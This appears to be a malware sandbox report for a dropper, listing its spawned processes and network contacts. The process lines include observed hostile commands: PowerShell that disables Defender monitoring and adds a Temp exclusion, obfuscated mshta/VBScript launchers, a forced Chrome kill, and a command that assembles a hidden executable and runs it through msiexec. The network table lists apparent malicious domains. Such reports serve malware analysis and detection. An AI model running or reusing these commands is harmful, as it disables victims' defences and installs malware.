C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe
Tue19c06f159e0ec.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe
Tue19b4ef3b53293fe.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe
Tue19c1338f41ab.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19325eb008c0b950.exe
Tue19325eb008c0b950.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe
Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue192762f1cd058ddf8.exe
Tue192762f1cd058ddf8.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c78ded4d176ac.exe
Tue19c78ded4d176ac.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe
Tue19761b3b8d9d.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1460 -ip 1460
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1969586bcbf58493.exe
Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1993b3f72c.exe
Tue1993b3f72c.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe
Tue19879c4c0e.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19150ee2be694c8a4.exe
Tue19150ee2be694c8a4.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe
Tue193858933525b62.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe
Tue19411ac950924ec3f.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe
Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp" /SL5="$70220,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 632
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe
"C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f
C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp" /SL5="$6023A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3332 -ip 3332
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue193858933525b62.exe" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3332 -s 360
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9fec6cc40,0x7ff9fec6cc4c,0x7ff9fec6cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1904 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2412 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2436 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3280,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3292 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4552,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3688,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4716 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4984,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4992 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4732,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4728 /prefetch:8
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 8daacf5718a3a2b07d13512e330086bd YPWomczBPkCLgTIkGFcoPg.0.1.0.0.0
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4800,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4904 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5260,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5268 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5416,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5196 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5572,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5588 /prefetch:2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4600 -ip 4600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 1204
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3744,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3892 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3516,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3456 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3972,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3512 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3444,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3900 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3892,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3468 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=2008,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3980 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=3912,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3448 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=1928,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1992 /prefetch:2
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4600 -ip 4600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 1552
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayanu.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| N/A | 127.0.0.1:52086 | tcp | |
| N/A | 127.0.0.1:52088 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.180.10:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| GB | 142.250.180.10:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| GB | 216.58.213.1:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.213.58.216.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | telegka.top | udp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| US | 8.8.8.8:53 | 21.138.155.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 104.155.138.21:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 82.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
